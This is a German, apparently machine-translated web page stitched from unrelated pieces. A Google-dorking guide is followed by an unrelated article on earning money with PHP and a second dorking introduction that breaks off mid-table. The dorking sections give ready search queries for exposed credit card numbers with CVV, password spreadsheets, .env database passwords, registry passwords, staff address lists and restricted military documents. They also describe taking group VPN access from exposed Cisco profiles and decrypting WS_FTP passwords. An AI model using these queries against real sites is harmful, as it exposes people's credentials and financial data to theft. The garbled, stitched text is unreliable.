Inurl PHP http welche Einnahmen. Wie kann man mit PHP-Kenntnissen Geld verdienen? Wie kann ein PHP-Programmierer zu Hause gutes Geld verdienen?

Das Erhalten privater Daten bedeutet nicht immer Hacking – manchmal werden sie öffentlich veröffentlicht. Wenn Sie die Google-Einstellungen kennen und ein wenig Einfallsreichtum haben, können Sie viele interessante Dinge finden – von Kreditkartennummern bis hin zu FBI-Dokumenten.

WARNUNG

Alle Informationen dienen ausschließlich Informationszwecken. Weder die Herausgeber noch der Autor sind für mögliche Schäden verantwortlich, die durch die Materialien dieses Artikels verursacht werden.

Heutzutage ist alles mit dem Internet verbunden, und es gibt kaum Bedenken, den Zugang einzuschränken. Daher werden viele private Daten zur Beute von Suchmaschinen. Spider-Roboter sind nicht mehr auf Webseiten beschränkt, sondern indizieren alle im Internet verfügbaren Inhalte und fügen ihren Datenbanken ständig nicht-öffentliche Informationen hinzu. Diese Geheimnisse herauszufinden ist einfach – Sie müssen nur wissen, wie man danach fragt.

Auf der Suche nach Dateien

In kompetenten Händen findet Google schnell alles, was nicht im Internet zu finden ist, zum Beispiel persönliche Informationen und Dateien für den dienstlichen Gebrauch. Sie sind oft wie ein Schlüssel unter einem Teppich versteckt: Es gibt keine wirklichen Zugangsbeschränkungen, die Daten liegen einfach auf der Rückseite der Seite, wohin keine Links führen. Die Standard-Weboberfläche von Google bietet nur grundlegende erweiterte Sucheinstellungen, aber auch diese reichen aus.

Mit zwei Operatoren können Sie Ihre Google-Suche auf einen bestimmten Dateityp beschränken: Dateityp und Ext. Der erste gibt das Format an, das die Suchmaschine anhand des Dateititels ermittelt hat, der zweite gibt die Dateierweiterung an, unabhängig von ihrem internen Inhalt. Bei der Suche müssen Sie in beiden Fällen nur die Erweiterung angeben. Anfangs war der ext-Operator praktisch in Fällen zu verwenden, in denen die Datei keine spezifischen Formatmerkmale aufwies (z. B. um nach INI- und CFG-Konfigurationsdateien zu suchen, die alles enthalten könnten). Jetzt haben sich die Algorithmen von Google geändert und es gibt keinen sichtbaren Unterschied zwischen den Operatoren – in den meisten Fällen sind die Ergebnisse dieselben.


Filtern der Ergebnisse

Standardmäßig sucht Google in allen Dateien auf indizierten Seiten nach Wörtern und im Allgemeinen nach eingegebenen Zeichen. Sie können den Suchbereich nach Top-Level-Domain, einer bestimmten Site oder nach der Position der Suchsequenz in den Dateien selbst einschränken. Für die ersten beiden Optionen verwenden Sie den Site-Operator, gefolgt vom Namen der Domain oder der ausgewählten Site. Im dritten Fall ermöglicht Ihnen eine ganze Reihe von Operatoren die Suche nach Informationen in Servicefeldern und Metadaten. Allinurl findet beispielsweise das angegebene im Textkörper der Links selbst, allinanchor im mit dem Tag versehenen Text , allintitle – in Seitentiteln, allintext – im Hauptteil der Seiten.

Für jeden Operator gibt es eine vereinfachte Version mit einem kürzeren Namen (ohne das Präfix all). Der Unterschied besteht darin, dass allinurl Links mit allen Wörtern findet und inurl nur Links mit dem ersten Wort. Das zweite und die folgenden Wörter der Abfrage können an einer beliebigen Stelle auf Webseiten erscheinen. Der Inurl-Operator unterscheidet sich auch von einem anderen Operator mit ähnlicher Bedeutung – Site. Mit der ersten Möglichkeit können Sie auch eine beliebige Zeichenfolge in einem Link zum durchsuchten Dokument finden (z. B. /cgi-bin/), die häufig zum Auffinden von Komponenten mit bekannten Schwachstellen verwendet wird.

Versuchen wir es in der Praxis. Wir nehmen den Allintext-Filter und veranlassen die Anfrage, eine Liste mit Nummern und Verifizierungscodes von Kreditkarten zu erstellen, die erst in zwei Jahren ablaufen (oder wenn ihre Besitzer es satt haben, alle zu ernähren).

Allintext: Ablaufdatum der Kartennummer / Lebenslauf 2017

Wenn Sie in den Nachrichten lesen, dass ein junger Hacker „in die Server des Pentagons oder der NASA gehackt“ und geheime Informationen gestohlen hat, sprechen wir in den meisten Fällen von einer solchen grundlegenden Technik der Verwendung von Google. Angenommen, wir interessieren uns für eine Liste der NASA-Mitarbeiter und deren Kontaktinformationen. Sicherlich liegt eine solche Liste in elektronischer Form vor. Der Einfachheit halber oder aus Gründen der Übersichtlichkeit kann die Angabe auch auf der Website der Organisation selbst erfolgen. Es ist logisch, dass in diesem Fall keine Links darauf vorhanden sind, da es für den internen Gebrauch bestimmt ist. Welche Wörter können in einer solchen Datei enthalten sein? Zumindest das Feld „Adresse“. Es ist einfach, alle diese Annahmen zu testen.


Inurl:nasa.gov Dateityp:xlsx „Adresse“


Wir nutzen Bürokratie

Funde wie dieser sind eine nette Geste. Einen wirklich soliden Fang liefert eine genauere Kenntnis der Google-Betreiber für Webmaster, des Netzwerks selbst und der Besonderheiten der Struktur des Gesuchten. Wenn Sie die Details kennen, können Sie die Ergebnisse einfach filtern und die Eigenschaften der erforderlichen Dateien verfeinern, um im Übrigen wirklich wertvolle Daten zu erhalten. Komisch, dass hier die Bürokratie Abhilfe schafft. Es erstellt Standardformulierungen, die sich für die Suche nach geheimen Informationen eignen, die versehentlich ins Internet gelangt sind.

Beispielsweise bedeutet der vom US-Verteidigungsministerium geforderte Stempel „Distribution Statement“ standardisierte Einschränkungen für die Verteilung eines Dokuments. Der Buchstabe A bezeichnet öffentliche Veröffentlichungen, die nichts Geheimnisvolles enthalten; B – nur für den internen Gebrauch bestimmt, C – streng vertraulich usw. bis F. Der Buchstabe X sticht gesondert hervor, der besonders wertvolle Informationen kennzeichnet, die ein Staatsgeheimnis auf höchstem Niveau darstellen. Lassen Sie diejenigen, die dies im Dienst tun sollen, nach solchen Dokumenten suchen, und wir beschränken uns auf Dateien mit dem Buchstaben C. Gemäß der DoDI-Richtlinie 5230.24 wird diese Kennzeichnung Dokumenten zugewiesen, die eine Beschreibung kritischer Technologien enthalten, die unter die Exportkontrolle fallen . Solche sorgfältig geschützten Informationen finden Sie auf Websites in der Top-Level-Domain .mil, die der US-Armee zugewiesen ist.

„VERTEILERKLÄRUNG C“ inurl:navy.mil

Es ist sehr praktisch, dass die .mil-Domain nur Websites des US-Verteidigungsministeriums und seiner Vertragsorganisationen enthält. Suchergebnisse mit einer Domain-Einschränkung sind außergewöhnlich sauber und die Titel sprechen für sich. Auf diese Weise nach russischen Geheimnissen zu suchen ist praktisch sinnlos: In den Domains.ru und.rf herrscht Chaos, und die Namen vieler Waffensysteme klingen wie botanische (PP „Kiparis“, selbstfahrende Waffen „Akatsia“) oder sogar fabelhafte ( AGB „Buratino“).


Wenn Sie jedes Dokument einer Website in der .mil-Domain sorgfältig studieren, können Sie andere Markierungen sehen, um Ihre Suche zu verfeinern. Beispielsweise ein Verweis auf die Exportbeschränkungen „Sec 2751“, der auch für die Suche nach interessanten technischen Informationen praktisch ist. Von Zeit zu Zeit wird es von den offiziellen Websites entfernt, auf denen es einmal aufgetaucht ist. Wenn Sie also einem interessanten Link in den Suchergebnissen nicht folgen können, verwenden Sie den Cache (Cache-Operator) von Google oder die Website des Internetarchivs.

In die Wolken klettern

Zusätzlich zu versehentlich freigegebenen Regierungsdokumenten tauchen gelegentlich Links zu persönlichen Dateien von Dropbox und anderen Datenspeicherdiensten im Cache von Google auf, die „private“ Links zu öffentlich veröffentlichten Daten erstellen. Bei alternativen und hausgemachten Dienstleistungen ist es noch schlimmer. Die folgende Abfrage findet beispielsweise Daten für alle Verizon-Kunden, die einen FTP-Server installiert haben und ihren Router aktiv nutzen.

Allinurl:ftp:// verizon.net

Mittlerweile gibt es mehr als vierzigtausend solcher klugen Köpfe, und im Frühjahr 2015 waren es noch viel mehr. Anstelle von Verizon.net können Sie auch den Namen eines beliebigen bekannten Anbieters verwenden. Je bekannter dieser ist, desto größer kann der Haken sein. Über den integrierten FTP-Server können Sie Dateien auf einem externen Speichergerät anzeigen, das mit dem Router verbunden ist. Normalerweise ist dies ein NAS für Remote-Arbeit, eine persönliche Cloud oder eine Art Peer-to-Peer-Datei-Download. Alle Inhalte solcher Medien werden von Google und anderen Suchmaschinen indiziert, sodass Sie über einen direkten Link auf Dateien zugreifen können, die auf externen Laufwerken gespeichert sind.

Schauen Sie sich die Konfigurationen an

Vor der flächendeckenden Migration in die Cloud herrschten einfache FTP-Server als Remote-Speicher vor, die ebenfalls viele Schwachstellen aufwiesen. Viele davon sind auch heute noch relevant. Das beliebte Programm WS_FTP Professional speichert beispielsweise Konfigurationsdaten, Benutzerkonten und Passwörter in der Datei ws_ftp.ini. Es ist leicht zu finden und zu lesen, da alle Datensätze im Textformat gespeichert werden und Passwörter nach minimaler Verschleierung mit dem Triple DES-Algorithmus verschlüsselt werden. In den meisten Versionen reicht es aus, einfach das erste Byte zu verwerfen.

Es ist einfach, solche Passwörter mit dem Dienstprogramm WS_FTP Password Decryptor oder einem kostenlosen Webdienst zu entschlüsseln.

Wenn man vom Hacken einer beliebigen Website spricht, meint man damit meist das Erhalten eines Passworts aus Protokollen und Backups von Konfigurationsdateien von CMS- oder E-Commerce-Anwendungen. Wenn Sie deren typische Struktur kennen, können Sie die Schlüsselwörter leicht angeben. Zeilen wie die in ws_ftp.ini sind äußerst häufig. Beispielsweise gibt es in Drupal und PrestaShop immer eine Benutzerkennung (UID) und ein entsprechendes Passwort (pwd) und alle Informationen werden in Dateien mit der Erweiterung .inc gespeichert. Sie können wie folgt danach suchen:

"pwd=" "UID=" ext:inc

Offenlegung von DBMS-Passwörtern

In den Konfigurationsdateien von SQL-Servern werden Benutzernamen und E-Mail-Adressen im Klartext gespeichert und ihre MD5-Hashes anstelle von Passwörtern geschrieben. Streng genommen ist es unmöglich, sie zu entschlüsseln, aber Sie können eine Übereinstimmung zwischen den bekannten Hash-Passwort-Paaren finden.

Es gibt immer noch DBMS, die nicht einmal Passwort-Hashing verwenden. Die Konfigurationsdateien von jedem von ihnen können einfach im Browser angezeigt werden.

Intext:DB_PASSWORD Dateityp:env

Mit dem Aufkommen von Windows-Servern wurde der Platz der Konfigurationsdateien teilweise von der Registrierung eingenommen. Sie können die Zweige auf genau die gleiche Weise durchsuchen, indem Sie reg als Dateityp verwenden. Zum Beispiel so:

Dateityp:reg HKEY_CURRENT_USER „Passwort“=

Vergessen wir nicht das Offensichtliche

Manchmal ist es möglich, mithilfe von Daten, die versehentlich geöffnet wurden und auf die Google aufmerksam geworden ist, an Verschlusssachen zu gelangen. Die ideale Option besteht darin, eine Liste von Passwörtern in einem gängigen Format zu finden. Nur verzweifelte Menschen können Kontoinformationen in einer Textdatei, einem Word-Dokument oder einer Excel-Tabelle speichern, aber es gibt immer genug davon.

Dateityp:xls inurl:passwort

Einerseits gibt es viele Möglichkeiten, solche Vorfälle zu verhindern. Es ist notwendig, ausreichende Zugriffsrechte in htaccess festzulegen, das CMS zu patchen, keine Linkshänder-Skripte zu verwenden und andere Lücken zu schließen. Es gibt auch eine Datei mit einer Liste von robots.txt-Ausnahmen, die Suchmaschinen daran hindert, die darin angegebenen Dateien und Verzeichnisse zu indizieren. Wenn andererseits die Struktur von robots.txt auf einem Server von der Standardstruktur abweicht, wird sofort klar, was sie darauf verbergen wollen.

Der Liste der Verzeichnisse und Dateien auf jeder Site wird der Standardindex vorangestellt. Da es zu Servicezwecken im Titel erscheinen muss, ist es sinnvoll, die Suche auf den Operator „intitle“ zu beschränken. Interessante Dinge befinden sich in den Verzeichnissen /admin/, /personal/, /etc/ und sogar /secret/.

Bleiben Sie dran für Updates

Relevanz ist hier enorm wichtig: Alte Schwachstellen werden nur sehr langsam geschlossen, Google und seine Suchergebnisse verändern sich jedoch ständig. Es gibt sogar einen Unterschied zwischen einem „Last Second“-Filter (&tbs=qdr:s am Ende der Anfrage-URL) und einem „Echtzeit“-Filter (&tbs=qdr:1).

Auch der zeitliche Abstand des Datums der letzten Aktualisierung der Datei wird von Google implizit angegeben. Über die grafische Weboberfläche können Sie einen der Standardzeiträume (Stunde, Tag, Woche usw.) auswählen oder einen Datumsbereich festlegen, diese Methode ist jedoch nicht für die Automatisierung geeignet.

Anhand des Aussehens der Adressleiste können Sie nur erahnen, wie Sie die Ausgabe von Ergebnissen mithilfe der Konstruktion &tbs=qdr: einschränken können. Der Buchstabe y danach legt die Grenze von einem Jahr fest (&tbs=qdr:y), m zeigt die Ergebnisse für den letzten Monat, w – für die Woche, d – für den vergangenen Tag, h – für die letzte Stunde, n – für die Minute, und s – für gib mir eine Sekunde. Die neuesten Ergebnisse, die Google gerade bekannt gegeben hat, werden mit dem Filter &tbs=qdr:1 gefunden.

Wenn Sie ein cleveres Skript schreiben müssen, ist es hilfreich zu wissen, dass der Datumsbereich in Google im Julian-Format mithilfe des Datumsbereichsoperators festgelegt wird. So finden Sie beispielsweise eine Liste von PDF-Dokumenten mit dem Wort „vertraulich“, heruntergeladen vom 1. Januar bis 1. Juli 2015.

Vertraulicher Dateityp: PDF-Datumsbereich: 2457024-2457205

Der Bereich wird im julianischen Datumsformat ohne Berücksichtigung des Nachkommateils angegeben. Die manuelle Übersetzung aus dem gregorianischen Kalender ist umständlich. Es ist einfacher, einen Datumskonverter zu verwenden.

Nochmals zielen und filtern

Neben der Angabe zusätzlicher Operatoren in der Suchanfrage können diese auch direkt im Linktext mitgesendet werden. Beispielsweise entspricht die Angabe filetype:pdf der Konstruktion as_filetype=pdf . Dies macht es bequem, Fragen zu stellen. Nehmen wir an, dass die Ausgabe von Ergebnissen nur aus der Republik Honduras durch Hinzufügen der Konstruktion cr=countryHN zur Such-URL angegeben wird, und nur aus der Stadt Bobruisk - gcs=Bobruisk. Eine vollständige Liste finden Sie im Entwicklerbereich.

Die Automatisierungstools von Google sollen das Leben einfacher machen, bringen aber oft auch Probleme mit sich. Beispielsweise wird die Stadt des Benutzers anhand der IP des Benutzers über WHOIS ermittelt. Basierend auf diesen Informationen gleicht Google nicht nur die Last zwischen den Servern aus, sondern ändert auch die Suchergebnisse. Je nach Region werden für dieselbe Anfrage unterschiedliche Ergebnisse auf der ersten Seite angezeigt, einige davon können sogar vollständig ausgeblendet sein. Der Zwei-Buchstaben-Code nach der gl=country-Direktive hilft Ihnen dabei, sich wie ein Kosmopolit zu fühlen und nach Informationen aus jedem Land zu suchen. Der Code der Niederlande lautet beispielsweise NL, der Vatikan und Nordkorea haben jedoch keinen eigenen Code in Google.

Oftmals sind die Suchergebnisse auch nach Verwendung mehrerer erweiterter Filter unübersichtlich. In diesem Fall lässt sich die Anfrage leicht verdeutlichen, indem man ihr mehrere Ausnahmewörter hinzufügt (jeweils ein Minuszeichen voranstellen). Beispielsweise werden Banking, Namen und Tutorial häufig mit dem Wort „Persönlich“ verwendet. Daher werden sauberere Suchergebnisse nicht durch ein Lehrbuchbeispiel einer Abfrage angezeigt, sondern durch eine verfeinerte:

Intitle:"Index of /Personal/" -names -tutorial -banking

Ein letztes Beispiel

Ein anspruchsvoller Hacker zeichnet sich dadurch aus, dass er sich selbst mit allem versorgt, was er braucht. VPN ist beispielsweise eine praktische Sache, aber entweder teuer oder vorübergehend und mit Einschränkungen. Der Abschluss eines Abonnements für sich selbst ist zu teuer. Gut, dass es Gruppenabonnements gibt und mit Hilfe von Google ist es einfach, Teil einer Gruppe zu werden. Suchen Sie dazu einfach die Cisco VPN-Konfigurationsdatei, die eine eher ungewöhnliche PCF-Erweiterung und einen erkennbaren Pfad hat: Programme\Cisco Systems\VPN Client\Profiles. Eine Anfrage und Sie werden zum Beispiel Teil des sympathischen Teams der Universität Bonn.

Dateityp: PCF VPN ODER Gruppe

DIE INFO

Google findet Passwortkonfigurationsdateien, aber viele davon sind verschlüsselt oder durch Hashes ersetzt. Wenn Sie Zeichenfolgen mit fester Länge sehen, suchen Sie sofort nach einem Entschlüsselungsdienst.

Passwörter werden verschlüsselt gespeichert, aber Maurice Massard hat bereits ein Programm zum Entschlüsseln geschrieben und stellt es kostenlos über thecampusgeeks.com zur Verfügung.

Google führt Hunderte verschiedener Arten von Angriffen und Penetrationstests durch. Es gibt viele Optionen, die gängige Programme, wichtige Datenbankformate, zahlreiche PHP-Schwachstellen, Clouds usw. betreffen. Wenn Sie genau wissen, wonach Sie suchen, können Sie die benötigten Informationen viel einfacher finden (insbesondere Informationen, die Sie nicht veröffentlichen wollten). Shodan ist nicht der Einzige, der interessante Ideen liefert, sondern jede Datenbank mit indizierten Netzwerkressourcen!

Vom Autor: Hallo Freunde! In diesem Artikel werden wir über die Programmiersprache PHP sprechen. Lassen Sie uns herausfinden, wofür es verwendet wird, was Sie damit machen können und welchen Platz es in den Phasen der Website-Entwicklung einnimmt. In diesem Artikel werden wir uns auch mit vielen Möglichkeiten befassen, wie man mit PHP-Programmierung Geld verdienen kann.

Was ist PHP und wozu dient es?

PHP ist eine Skriptsprache, die sehr aktiv bei der Entwicklung von Webanwendungen eingesetzt wird. PHP ist eine der führenden Sprachen für die Entwicklung dynamischer Websites.

PHP ist eine serverseitige Programmiersprache. Alle in dieser Sprache geschriebenen Skripte werden auf dem Server mit der Site ausgeführt. Um PHP zu studieren, Websites und Skripte zu entwickeln und zu debuggen, müssen Sie natürlich keinen echten Server im Internet kaufen. Zu diesem Zweck werden Serveremulatoren verwendet, die in Form von Programmen einfach auf einem funktionierenden Computer installiert werden. Und auf einem Server im Internet (Hosting) werden vorgefertigte Webseiten und Seiten mit PHP-Skripten abgelegt. Übrigens unterstützt fast jedes moderne Hosting die PHP-Sprache.

Die Beliebtheit dieser Sprache im Bereich der Website-Erstellung wird durch das Vorhandensein einer großen Anzahl integrierter Tools zur Entwicklung von Webanwendungen bestimmt. Die wichtigsten:

automatische Extraktion von POST- und GET-Parametern sowie Webserver-Umgebungsvariablen in vordefinierte Arrays;

Interaktion mit einer Vielzahl verschiedener Datenbankmanagementsysteme (MySQL, MySQLi, SQLite, PostgreSQL, Oracle (OCI8), Oracle, Microsoft SQL Server, Sybase, ODBC, mSQL, IBM DB2, Cloudscape und Apache Derby, Informix, Ovrimos SQL, Lotus Notes, DB++, DBM, dBase, DBX, FrontBase, FilePro, Ingres II, SESAM, Firebird / InterBase, Paradox File Access, MaxDB, PDO-Schnittstelle);

automatisierter Versand von HTTP-Headern;

Arbeiten mit Cookies und Sitzungen;

Arbeiten mit lokalen und Remote-Dateien, Sockets;

Verarbeitung von auf den Server hochgeladenen Dateien;

Arbeiten mit XForms.

Schauen wir uns ein Beispiel an, bei dem das PHP-Skript auf der Seite ausgeführt wird. Nehmen Sie zum Beispiel das Anmeldeformular, in das Sie auf vielen Websites Ihren Namen und Ihre E-Mail-Adresse eingeben. HTML und CSS sind für das Erscheinungsbild des Formulars verantwortlich – die Farben der Eingabefelder und Schaltflächen, das Ändern der Farbe der Schaltfläche, wenn Sie mit der Maus darüber fahren und darauf klicken, und so weiter. Mithilfe von HTML5 können Sie die Richtigkeit der im Formular eingegebenen Daten überprüfen – beispielsweise ob die E-Mail- oder Telefonfelder korrekt ausgefüllt sind.

Und nachdem Sie auf die Schaltfläche „Abonnieren“ geklickt haben, wird ein PHP-Skript aufgerufen, das die von Ihnen in das Formular eingegebenen Daten entgegennimmt. Das Skript zeichnet sie in der Datenbank auf, generiert und sendet Ihnen einen Link zur Bestätigung Ihres Abonnements an die im Formular angegebene E-Mail, prüft die Abonnementbestätigung und sendet Ihnen nachfolgende E-Mails. Alle diese Vorgänge werden auf dem Server ausgeführt, und zwar mithilfe der Programmiersprache PHP.

Anwendung von PHP in der Website-Entwicklung

Um eine Website zu erstellen, müssen Sie mehrere Phasen durchlaufen:

Planung. In dieser Phase planen wir die zukünftige Site: Für wen und warum erstellen wir sie, wer wird die Site besuchen, womit soll sie gefüllt werden, was soll auf der Site sein und so weiter.

Design. In der Designphase erstellen wir das Erscheinungsbild der Seiten der Website in einem grafischen Editor.

Layout. In der Layoutphase erstellen wir mithilfe von HTML und CSS die HTML-Seiten der zukünftigen Website aus den in der Designphase erhaltenen Layouts.

Programmierung. In der Programmierphase automatisieren wir die Prozesse der Arbeit mit der Website. Wir programmieren den administrativen Teil der Website (Admin-Panel), sodass Sie vorhandene Seiten hinzufügen, löschen und bearbeiten können, selbst für eine Person, die mit der Website-Erstellung überhaupt nicht vertraut ist. Wir programmieren so, dass die Suche und alle Anmeldeformulare (falls vorhanden) auf der Website funktionieren. Wir sorgen dafür, dass die neu hinzugefügte Seite auf der Website angezeigt wird und im Menü automatisch ein Link zur erstellten Seite erscheint. Wenn die Website eine Abstimmung oder eine Umfrage verwendet, wird dies ebenfalls alles in PHP programmiert, und zwar in der Programmierphase.

Wenn wir die Phase der Programmierung einer größeren Website, beispielsweise eines Online-Shops, betrachten, dann ist hier alles noch breiter und interessanter. In diesem Fall fügen wir nicht nur Seiten, sondern auch Produkte hinzu – den Hauptinhalt des Online-Shops. Darüber hinaus müssen Sie im Admin-Bereich eine Aufschlüsselung der hinzugefügten Produkte in verschiedene Kategorien bereitstellen. Es sollte auch möglich sein, das Produkt zu bearbeiten, seine Beschreibung, seinen Preis, sein Bild usw. zu ändern.

Darüber hinaus erfordert ein Online-Shop die Programmierung eines Analysesystems – damit Sie im Admin-Panel sehen können, wie viele Bestellungen aufgegeben und bezahlt wurden, für welchen Betrag und welche Produkte aus welchen Kategorien usw. bezahlt wurden. Darüber hinaus sollte es so sein Es ist möglich, solche Berichte für verschiedene Zeiträume anzuzeigen. Bei der Programmierung eines Online-Shops wird häufig auch das Umsatzreporting für Buchhaltungs- und Steuerzwecke implementiert.

Deshalb ist die Phase, in der die Programmiersprache PHP zum Einsatz kommt, die wichtigste, zeitlich längste, teuerste und bestbezahlte in der Website-Entwicklung. Und wenn Sie erst einmal verstanden haben, wie man einen Online-Shop programmiert, können Sie Skripte für eine Website nahezu beliebiger Komplexität erstellen.

Popularität von PHP

Die Beliebtheit von PHP wird durch die Tatsache belegt, dass es von 83,1 % aller Websites verwendet wird, bei denen eine serverseitige Programmiersprache identifiziert werden konnte.

Alle beliebtesten CMS, die in der Beliebtheitsskala die ersten Plätze belegen (sowohl kostenpflichtig als auch kostenlos: WordPress, Joomla, Drupal, Modx, Bitrix, Magento usw.), sind in der Programmiersprache PHP geschrieben.

Die Beliebtheit der Programmiersprache PHP wird auch durch die vielen erstellten PHP-Frameworks wie Laravel, Yii, CakePHP, Slim, Zend Framework 2, PHPixie, CodeIgniter, Symfony 2 und andere belegt. Es gibt eine Vielzahl von Foren und großen Communities – für PHP im Allgemeinen, für jedes Framework und für jedes CMS einzeln.
Ich möchte auch hinzufügen, dass die größten Websites der Welt, zum Beispiel Facebook und Wikipedia, ebenfalls in PHP geschrieben sind.

Wie kann man mit PHP-Kenntnissen Geld verdienen?

Angesichts der Beliebtheit von PHP besteht eine konstant hohe Nachfrage nach PHP-Programmierern. Kenntnisse in PHP und die Fähigkeit, in dieser Sprache zu programmieren, eröffnen Ihnen neue Möglichkeiten, Geld zu verdienen. Schauen wir uns die wichtigsten an, mit denen Sie heute wirklich Geld verdienen können:

Geld verdienen durch die Entwicklung von Skripten. Alle Websites entwickeln sich ständig weiter und erfordern regelmäßig das Schreiben neuer Skripte oder die Entwicklung zusätzlicher Funktionen, Module usw. Für solche Entwicklungen wenden sich Websitebesitzer an PHP-Entwickler. Darüber hinaus können Sie in diesem Fall auf zwei Arten Geld verdienen:

Aufträge verfolgen, um einen freiberuflichen Entwickler zu finden;

Generieren Sie Ideen für Massenskripte. Wenn Sie eine Idee für ein Skript haben, das beispielsweise bei Besitzern von Online-Shops auf jeden Fall gefragt sein wird, können Sie ein solches Skript selbstständig entwickeln und an Online-Shop-Besitzer verkaufen;

Fertigstellung vorgefertigter Skripte „auf Bestellung“. Hier ist alles ganz einfach – Sie übernehmen die Änderung oder Korrektur eines Skripts. In diesem Fall gibt es jedoch eine Nuance: Das Skript ist anfangs möglicherweise nicht sehr gut erstellt und seine Verfeinerung kann mehr Zeit in Anspruch nehmen, als ein Skript von Grund auf neu zu schreiben. Wenn Sie diese Art des Geldverdienens nutzen, überlegen Sie sich daher zunächst genau, was Sie ändern und vervollständigen werden.

Entwicklung von Plugins für CMS. Bei dieser Methode ist alles das Gleiche wie beim Geldverdienen mit Skripten. Für Websites, die mit einem vorgefertigten CMS erstellt wurden, ist häufig das Schreiben einer Art Plugin, Add-on oder Erweiterung erforderlich. Und Sie können hier auf zwei Arten Geld verdienen:

Aufträge für die Entwicklung von Plugins, Add-ons und Erweiterungen auf freiberuflicher Basis verfolgen;

ein Massen-Plugin entwickeln und verkaufen, das auf den meisten Websites definitiv gefragt sein wird;

Eigene und gemeinsame Projekte. Wenn Sie eine Idee für ein Internetprojekt (Startup) haben, zum Beispiel eine Idee für einen nützlichen Dienst oder eine Anwendung, die ein bestimmtes Problem lösen würde, dann können Sie mit der Umsetzung beginnen. In der Anfangsphase kann es sich sogar um ein reines Hobby neben dem Hauptberuf handeln. Wenn dann klar ist, dass sich das Hobby zu einem großen Projekt entwickelt, kann man sich mehr Zeit dafür nehmen.

Erstellung dynamischer Websites und Engines für sie. Sie können auch gutes Geld verdienen, indem Sie individuelle Websites entwickeln, als Freiberufler oder in einem Webstudio arbeiten.

Websites für sich selbst erstellen. Sie können eine Website für sich selbst erstellen, sie mit nützlichen Inhalten füllen – und wenn die Website eine ausreichende Anzahl von Besuchern hat, können Sie damit beginnen, Geld zu verdienen, indem Sie bezahlte Werbung darauf platzieren oder die Produkte einer anderen Person über Partnerprogramme bewerben.

Ich denke, viele von Ihnen haben gedacht, dass alle oben genannten Methoden zum Geldverdienen kombiniert werden können. Und es ist richtig! Sie können eine Website für sich selbst erstellen und passiv Geld verdienen, indem Sie damit Werbung verkaufen. Außerdem können Sie ein Skript oder Plugin erstellen und es auf spezialisierten Websites verkaufen, wobei Sie mit jedem Verkauf Geld per Autopilot verdienen und gleichzeitig weiterhin in einer Website arbeiten können Studio. Warum nicht? Natürlich kannst du!

Wie viel kann ein PHP-Entwickler verdienen?

Beim Verdienst von PHP-Programmierern ist alles individuell. Hier hängt viel davon ab, wo man arbeitet, wie man arbeitet, welchen Wissensstand, welche Erfahrung, Qualifikationen, welche damit verbundenen Zusatzkenntnisse der Entwickler hat und so weiter. Daher kann es hier grundsätzlich keine genaue Zahl geben. Aber wir können uns ansehen, welche Gehälter bei der Suche nach PHP-Programmierern in einem Webstudio angeboten werden und wie viel sie bereit sind, auf Freelance-Börsen für ein Projekt zu zahlen.

Das Bild unten zeigt das vorgeschlagene Gehalt für PHP-Programmierer in einem Webstudio. Darüber hinaus ist dies das Gehalt für PHP-Programmierer ohne Berufserfahrung:

Wenn Sie Berufserfahrung haben, können Sie viel mehr verdienen. Nachfolgend finden Sie die Gehälter, die erfahrenen PHP-Programmierern angeboten werden.

Und auch als Freelancer lässt sich heute ordentlich Geld verdienen:

Abschluss

PHP ist die beliebteste Programmiersprache unter Webentwicklern. Die überwiegende Mehrheit aller Websites im Internet ist in PHP geschrieben. Mit den Kenntnissen und der Fähigkeit, sich in dieser Programmiersprache zu entwickeln, kann man gutes Geld verdienen, und es gibt viele Möglichkeiten, Geld zu verdienen – von der Arbeit in einem Webstudio bis hin zur Entwicklung eines eigenen Projekts oder Startups.

Jede Suche nach Schwachstellen in Webressourcen beginnt mit der Aufklärung und Informationssammlung.
Die Intelligenz kann entweder aktiv sein – Brute-Force von Dateien und Verzeichnissen der Website, Ausführen von Schwachstellenscannern, manuelles Durchsuchen der Website oder passiv – Suchen nach Informationen in verschiedenen Suchmaschinen. Manchmal kommt es vor, dass eine Sicherheitslücke bereits vor dem Öffnen der ersten Seite der Website bekannt wird.

Wie ist das möglich?
Suchroboter, die ständig im Internet unterwegs sind, zeichnen neben für den Durchschnittsbenutzer nützlichen Informationen häufig auch Dinge auf, die von Angreifern zum Angriff auf eine Webressource verwendet werden können. Zum Beispiel Skriptfehler und Dateien mit vertraulichen Informationen (von Konfigurationsdateien und Protokollen bis hin zu Dateien mit Authentifizierungsdaten und Datenbanksicherungen).
Aus der Sicht eines Suchroboters handelt es sich bei einer Fehlermeldung über die Ausführung einer SQL-Abfrage um Klartext, der beispielsweise untrennbar mit der Beschreibung der Produkte auf der Seite verbunden ist. Wenn ein Suchroboter plötzlich auf eine Datei mit der Erweiterung .sql stößt, die aus irgendeinem Grund im Arbeitsordner der Site landet, wird sie als Teil des Inhalts der Site wahrgenommen und ebenfalls indiziert (einschließlich möglicherweise der Passwörter). darin angegeben).

Solche Informationen können gefunden werden, indem man starke, oft einzigartige Schlüsselwörter kennt, die dabei helfen, „anfällige Seiten“ von Seiten zu unterscheiden, die keine Schwachstellen enthalten.
Auf Exploit-db.com existiert eine riesige Datenbank spezieller Suchanfragen mit Schlüsselwörtern (sogenannte Dorks), die als Google Hack Database bekannt ist.

Warum googlen?
Dorks richten sich in erster Linie gegen Google aus zwei Gründen:
− die flexibelste Syntax von Schlüsselwörtern (siehe Tabelle 1) und Sonderzeichen (siehe Tabelle 2);
− Der Google-Index ist immer noch vollständiger als der anderer Suchmaschinen.

Tabelle 1 – Wichtigste Google-Keywords

Stichwort
Bedeutung
Beispiel
Website
Suchen Sie nur auf der angegebenen Site. Berücksichtigt nur die URL
site:somesite.ru – findet alle Seiten einer bestimmten Domain und Subdomains
inurl
Suche nach im URI vorhandenen Wörtern. Im Gegensatz zu cl. Wörter „Site“ sucht nach Übereinstimmungen nach dem Site-Namen
inurl:news – findet alle Seiten, auf denen das angegebene Wort in der URI vorkommt
im Text
Suchen Sie im Hauptteil der Seite
intext: „Verkehrsstaus“ – völlig ähnlich der üblichen Abfrage nach „Verkehrsstaus“
Titel
